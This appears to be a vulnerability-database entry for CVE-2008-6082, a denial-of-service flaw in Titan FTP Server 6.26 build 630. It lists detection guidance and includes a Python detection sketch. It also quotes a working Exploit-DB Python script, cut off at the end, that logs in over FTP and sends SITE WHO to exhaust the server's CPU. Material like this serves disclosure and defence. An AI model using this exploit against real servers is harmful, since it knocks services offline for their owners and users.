CVE-2008-6082
Published 2009-02-06
CVE-2008-6082: Titan FTP Server 6.26 build 630 allows remote attackers to cause a denial of service (CPU consumption) via the SITE WHO command.
Priority P431 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 44.58% (98.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| southrivertech | titan_ftp_server | — | — |
Detection & IOCs (extracted from sources)
- Detect FTP sessions issuing the 'SITE WHO' command, particularly from anonymous or low-privilege accounts, as this is the sole trigger for the DoS condition.
- Anonymous FTP access is sufficient to exploit this vulnerability; monitor for anonymous logins followed by SITE WHO commands.
- Monitor for sustained CPU consumption on Windows hosts running Titan FTP Server 6.26 build 630 following receipt of a SITE WHO FTP command.
- A valid FTP login (including anonymous) is required before the malicious SITE WHO command can be sent; correlate authentication events with subsequent SITE WHO issuance.
- The exploit requires at minimum an anonymous FTP login, meaning no special credentials are needed to trigger the DoS; disabling anonymous FTP access would raise the bar for exploitation.
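The correlation described in the bullets above (a successful login, anonymous or not, followed by SITE WHO in the same session) can be sketched as follows. This is an added example, not a rule from the page or from any vendor; the log line format, the session ids and the sample lines are constructed assumptions and do not reflect Titan FTP Server's native log format.

```python
import re

# Constructed sample. Assumed line format (not Titan's native log format):
#   <timestamp> <session-id> <client-ip> <C|S> <FTP command or reply>
SAMPLE_LOG = """\
2008-10-14T09:00:01 s1 192.0.2.10 C user anonymous
2008-10-14T09:00:01 s1 192.0.2.10 S 331 Password required
2008-10-14T09:00:02 s1 192.0.2.10 C pass ****
2008-10-14T09:00:02 s1 192.0.2.10 S 230 User logged in
2008-10-14T09:00:03 s1 192.0.2.10 C SITE WHO
2008-10-14T09:05:10 s2 192.0.2.20 C USER alice
2008-10-14T09:05:11 s2 192.0.2.20 C PASS ****
2008-10-14T09:05:11 s2 192.0.2.20 S 230 User logged in
2008-10-14T09:05:12 s2 192.0.2.20 C site   who
2008-10-14T09:07:00 s3 192.0.2.30 C USER bob
2008-10-14T09:07:01 s3 192.0.2.30 C PASS ****
2008-10-14T09:07:01 s3 192.0.2.30 S 530 Login incorrect
2008-10-14T09:07:02 s3 192.0.2.30 C SITE WHO
2008-10-14T09:09:00 s4 192.0.2.40 C USER anonymous
2008-10-14T09:09:01 s4 192.0.2.40 S 230 User logged in
2008-10-14T09:09:02 s4 192.0.2.40 C SITE HELP
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) ([CS]) (.*)$")
SITE_WHO = re.compile(r"^SITE\s+WHO\s*$", re.IGNORECASE)  # FTP verbs are case-insensitive
ANONYMOUS = {"anonymous", "ftp"}

def detect_site_who(log_text):
    """Return one alert per SITE WHO issued inside a logged-in session."""
    sessions, alerts = {}, []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, sid, ip, direction, payload = m.groups()
        s = sessions.setdefault(sid, {"user": "", "logged_in": False})
        if direction == "S":
            # A 230 reply marks a successful login; 530 leaves the session unauthenticated.
            s["logged_in"] = s["logged_in"] or payload.startswith("230")
        elif payload.split(" ", 1)[0].upper() == "USER":
            s["user"], s["logged_in"] = payload[5:].strip(), False
        elif s["logged_in"] and SITE_WHO.match(payload):
            alerts.append({"time": ts, "session": sid, "client": ip, "user": s["user"],
                           "anonymous": s["user"].lower() in ANONYMOUS})
    return alerts

if __name__ == "__main__":
    for alert in detect_site_who(SAMPLE_LOG):
        print(alert)
```

Alerts flagged `anonymous` correspond to the no-credentials case the bullets call out; pairing them with host CPU telemetry covers the third bullet.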
No detection rules found.
Exploit-DB
Titan FTP Server 6.26 build 630 - Remote Denial of Service
exploitdb·2008-10-14
---
```python
# Titan FTP server v6.26 build 630 remote DoS exploit
# Titan FTP URL - http://www.titanftp.com/
# DoS'ed on "SITE WHO" command
# (x)dmnt
# -*- coding: windows-1252 -*-
import socket
import sys

def help_info():
    print ("Usage: titand0s \n")
    print ("Note: anonymous is enought\n")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    sock.send("SITE WHO\r\n")
    sock.close()
    print "[0] Now server d0s'ed"

print ("\n]Titan FTP server v6.2
```
Metasploit
Titan FTP Server 6.26.630 SITE WHO DoS
metasploit
The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE WHO". You need a valid login so you can send this command.
No writeups or analysis indexed.
- http://secunia.com/advisories/32269
- http://www.osvdb.org/49177
- http://www.securityfocus.com/bid/31757
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45871
- https://www.exploit-db.com/exploits/6753
Published: 2009-02-06